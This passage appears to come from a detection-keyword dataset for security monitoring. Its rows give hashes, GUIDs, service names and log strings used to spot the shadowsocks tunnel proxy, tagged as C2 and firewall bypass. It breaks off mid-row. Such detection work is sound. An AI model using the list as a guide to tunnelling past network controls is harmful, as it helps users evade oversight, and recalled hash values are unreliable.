"*46143050aa4cea03129c03b45faacccaa3773f2d7f300f7f031ffb83de547cbf*",".{0,1000}46143050aa4cea03129c03b45faacccaa3773f2d7f300f7f031ffb83de547cbf.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*4a302071d7fc21367f31e0d9c5f77ef1eb41ec097eaeadb8d65472b6be55ab99*",".{0,1000}4a302071d7fc21367f31e0d9c5f77ef1eb41ec097eaeadb8d65472b6be55ab99.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*4acb4274db08c54c943eef6f456c6913557163d203cbd8be63a6780e5dcf7a42*",".{0,1000}4acb4274db08c54c943eef6f456c6913557163d203cbd8be63a6780e5dcf7a42.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*4b7786288011e1255695cdae0c2199353203fd94c2c6fa57bc3be3d332344c6a*",".{0,1000}4b7786288011e1255695cdae0c2199353203fd94c2c6fa57bc3be3d332344c6a.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" 
"*4d75006597652c67dc56aa9a078eeca3a52634bf1bf591b68c926bd01ad53d25*",".{0,1000}4d75006597652c67dc56aa9a078eeca3a52634bf1bf591b68c926bd01ad53d25.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*4f932e61afb6bd1dd8b5c4c25c715f1623d3f574637d8154256531b4ef5000ac*",".{0,1000}4f932e61afb6bd1dd8b5c4c25c715f1623d3f574637d8154256531b4ef5000ac.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*5bb545bf51618a253b1ccc145bf97c8ab29d9118d6ac5e90b9bfc33bb988c3d7*",".{0,1000}5bb545bf51618a253b1ccc145bf97c8ab29d9118d6ac5e90b9bfc33bb988c3d7.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*62786ba330d6b4969906b297fbb26c3f9a9ad36672b4600938d3b607e9b3c980*",".{0,1000}62786ba330d6b4969906b297fbb26c3f9a9ad36672b4600938d3b607e9b3c980.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" 
"*62b74a688d22bfdf20f673a351580029d7b9de67c6facc9a5613b22b3f798968*",".{0,1000}62b74a688d22bfdf20f673a351580029d7b9de67c6facc9a5613b22b3f798968.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*662f875055d740d98e0047adeb2b632b85cafffa2129c1635c5312217ca978f3*",".{0,1000}662f875055d740d98e0047adeb2b632b85cafffa2129c1635c5312217ca978f3.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*69c2084081bcd8ea91474bc4292863af35bdafa0b3e3b585195bdb0e0523a419*",".{0,1000}69c2084081bcd8ea91474bc4292863af35bdafa0b3e3b585195bdb0e0523a419.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*6a842f64b5e04384ef3a1cb19797f2aa714ab44b3320f132529c60f4aafc6d75*",".{0,1000}6a842f64b5e04384ef3a1cb19797f2aa714ab44b3320f132529c60f4aafc6d75.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" 
"*6c8aefae3e5ece28c1e182ffec2c00baf2faa7ca61c426b1db6275b03524dc8d*",".{0,1000}6c8aefae3e5ece28c1e182ffec2c00baf2faa7ca61c426b1db6275b03524dc8d.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*6e2028eb0bc06325c6101c497832e66a95ce482b1771455bc7a873ef22291c65*",".{0,1000}6e2028eb0bc06325c6101c497832e66a95ce482b1771455bc7a873ef22291c65.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*7749bb3fa881d702bdcaf541f87308c438663ef32fc67c07d0c10c286f7da12f*",".{0,1000}7749bb3fa881d702bdcaf541f87308c438663ef32fc67c07d0c10c286f7da12f.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*78EB3006-81B0-4C13-9B80-E91766874A57*",".{0,1000}78EB3006\-81B0\-4C13\-9B80\-E91766874A57.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" 
"*7a52b4827a4dac14ccd0c8a05a46c7debafca33672285e7630ee8f8e54387738*",".{0,1000}7a52b4827a4dac14ccd0c8a05a46c7debafca33672285e7630ee8f8e54387738.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*81257d02ae9cd6d59809ea470ce590cdeb3e7949f5a51dfacba21e1cd3d2713e*",".{0,1000}81257d02ae9cd6d59809ea470ce590cdeb3e7949f5a51dfacba21e1cd3d2713e.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*83c2966fe942b2b0a1e31ea84f6336c024cb57ff5c397b0d1cddf050bb4e5b21*",".{0,1000}83c2966fe942b2b0a1e31ea84f6336c024cb57ff5c397b0d1cddf050bb4e5b21.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*8455f37f4777a237e87e3326cc9dd7af51b3bc2cfe968ff488e85effb2ca30ac*",".{0,1000}8455f37f4777a237e87e3326cc9dd7af51b3bc2cfe968ff488e85effb2ca30ac.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" 
"*87907a6d7e8d6b4cdf4264950869799096b5ebc9c3de4c9ed0204d91650ed54e*",".{0,1000}87907a6d7e8d6b4cdf4264950869799096b5ebc9c3de4c9ed0204d91650ed54e.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*8923E1ED-2594-4668-A4FA-DC2CFF7EA1CA*",".{0,1000}8923E1ED\-2594\-4668\-A4FA\-DC2CFF7EA1CA.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*8bd3acb166ddf194c57b5a38af0c9b3d1a60ab623fd04efa94434dcf5bb787c8*",".{0,1000}8bd3acb166ddf194c57b5a38af0c9b3d1a60ab623fd04efa94434dcf5bb787c8.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*913a779a64c4488167dd4d0e43427498ac2bb64b63ad6075b38c5c4af4f2e768*",".{0,1000}913a779a64c4488167dd4d0e43427498ac2bb64b63ad6075b38c5c4af4f2e768.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*94DE5045-4D09-437B-BDE3-679FCAF07A2D*",".{0,1000}94DE5045\-4D09\-437B\-BDE3\-679FCAF07A2D.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that 
helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*9509da528a842ad647f557e84ec00afbaf345222bf7d6219031bf176e4bba80e*",".{0,1000}9509da528a842ad647f557e84ec00afbaf345222bf7d6219031bf176e4bba80e.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*97C056B0-2AEB-4467-AAC9-E0FE0639BA9E*",".{0,1000}97C056B0\-2AEB\-4467\-AAC9\-E0FE0639BA9E.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*97c1afbdfbe31e7fed17143d9885be6588be294488cffc83661a5ef55655d3d2*",".{0,1000}97c1afbdfbe31e7fed17143d9885be6588be294488cffc83661a5ef55655d3d2.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*99142A50-E046-4F18-9C52-9855ABADA9B3*",".{0,1000}99142A50\-E046\-4F18\-9C52\-9855ABADA9B3.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" 
"*a44ba10f3e101f1118ea65ff2272e1b2da2d0ac96ceb0043bf3c9c75ad4a53a7*",".{0,1000}a44ba10f3e101f1118ea65ff2272e1b2da2d0ac96ceb0043bf3c9c75ad4a53a7.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*a5e9856fc84492bf129cca06659842ccc9705f7e24eaa9bd6ec5d529f7c61abb*",".{0,1000}a5e9856fc84492bf129cca06659842ccc9705f7e24eaa9bd6ec5d529f7c61abb.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*a9b64e47ef85ace30ca6ea6e9d79fdc665a7eb7b0a4763a659f00aa307cf7ad5*",".{0,1000}a9b64e47ef85ace30ca6ea6e9d79fdc665a7eb7b0a4763a659f00aa307cf7ad5.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*AE81B416-FBC4-4F88-9EFC-D07D8789355F*",".{0,1000}AE81B416\-FBC4\-4F88\-9EFC\-D07D8789355F.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" 
"*b4810eb33bbc3888e66d51db3c76a52abe7b98d8520584daa8d92c03e412be57*",".{0,1000}b4810eb33bbc3888e66d51db3c76a52abe7b98d8520584daa8d92c03e412be57.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*b5df12aab758bbaea8291069515a6e46b84b7b5326f24d54410fa20ac8c0c447*",".{0,1000}b5df12aab758bbaea8291069515a6e46b84b7b5326f24d54410fa20ac8c0c447.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*b6d55d6536ff5e827c393516158924d228cfc2de2d127e302537e0f4abf1f98f*",".{0,1000}b6d55d6536ff5e827c393516158924d228cfc2de2d127e302537e0f4abf1f98f.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*ba5e8ac5fc350cef4640480e48932359266bff6a2a85fff3a9163dc07e5a310b*",".{0,1000}ba5e8ac5fc350cef4640480e48932359266bff6a2a85fff3a9163dc07e5a310b.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" 
"*cab2848992b779a1bdcdf76553265dc73b70046442ec9949135a515f7b65819f*",".{0,1000}cab2848992b779a1bdcdf76553265dc73b70046442ec9949135a515f7b65819f.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*d19215f26a1791d5f04cd626f65108628e507be6df194fec4fe25115d74469ab*",".{0,1000}d19215f26a1791d5f04cd626f65108628e507be6df194fec4fe25115d74469ab.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*d39f61dbf2a753769c0efb7712dd7bfa6e1d1593ebaed06150f206f3b6ff7de2*",".{0,1000}d39f61dbf2a753769c0efb7712dd7bfa6e1d1593ebaed06150f206f3b6ff7de2.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*DFE11C77-62FA-4011-8398-38626C02E382*",".{0,1000}DFE11C77\-62FA\-4011\-8398\-38626C02E382.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" 
"*e1f6be0e39290a73ebd45a3f6254015badf0f451307ded5d96d2a3acb91e0642*",".{0,1000}e1f6be0e39290a73ebd45a3f6254015badf0f451307ded5d96d2a3acb91e0642.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*e3584150cc2cc74f7582e84f91ae9c258e63b67e722b0219a6378212c03ee85a*",".{0,1000}e3584150cc2cc74f7582e84f91ae9c258e63b67e722b0219a6378212c03ee85a.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*e6225af4ab483e49445f0021bc05efc405e544e7a725eb6ecb3f8777a8783109*",".{0,1000}e6225af4ab483e49445f0021bc05efc405e544e7a725eb6ecb3f8777a8783109.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*e6fe3c2968b235f58bdd9b5e0d1eefafb1e577c9fc7a533eb88e198d11773b2d*",".{0,1000}e6fe3c2968b235f58bdd9b5e0d1eefafb1e577c9fc7a533eb88e198d11773b2d.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" 
"*e9fad6bcba22427d7efb3d9b341d11173659a06cc12670ba9d542aeb670284b8*",".{0,1000}e9fad6bcba22427d7efb3d9b341d11173659a06cc12670ba9d542aeb670284b8.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*EA1FB2D4-B5A7-47A6-B097-2F4D29E23010*",".{0,1000}EA1FB2D4\-B5A7\-47A6\-B097\-2F4D29E23010.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*f3cb648c848b10ea67fe776ed08f1de7258d3e3e4f1b9a5779ecd500de9e9dd0*",".{0,1000}f3cb648c848b10ea67fe776ed08f1de7258d3e3e4f1b9a5779ecd500de9e9dd0.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*f5f1aeff01f602aca4aa2da893395b2ae6552325e46ffe31c267ae5494558c8e*",".{0,1000}f5f1aeff01f602aca4aa2da893395b2ae6552325e46ffe31c267ae5494558c8e.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*F60CD6D5-4B1C-4293-829E-9C10D21AE8A3*",".{0,1000}F60CD6D5\-4B1C\-4293\-829E\-9C10D21AE8A3.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you 
bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*privoxy_UID.conf*",".{0,1000}privoxy_UID\.conf.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*Shadowsocks Local Service*",".{0,1000}Shadowsocks\sLocal\sService.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","Servicename","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*Shadowsocks started TCP*",".{0,1000}Shadowsocks\sstarted\sTCP.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*Shadowsocks started UDP*",".{0,1000}Shadowsocks\sstarted\sUDP.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*Shadowsocks.PAC.*",".{0,1000}Shadowsocks\.PAC\..{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*Shadowsocks.Protocol*",".{0,1000}Shadowsocks\.Protocol.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*Shadowsocks.WPF*",".{0,1000}Shadowsocks\.WPF.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*shadowsocks/shadowsocks-rust*",".{0,1000}shadowsocks\/shadowsocks\-rust.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*shadowsocks/shadowsocks-windows*",".{0,1000}shadowsocks\/shadowsocks\-windows.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*shadowsocks/ssserver-rust*",".{0,1000}shadowsocks\/ssserver\-rust.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - 
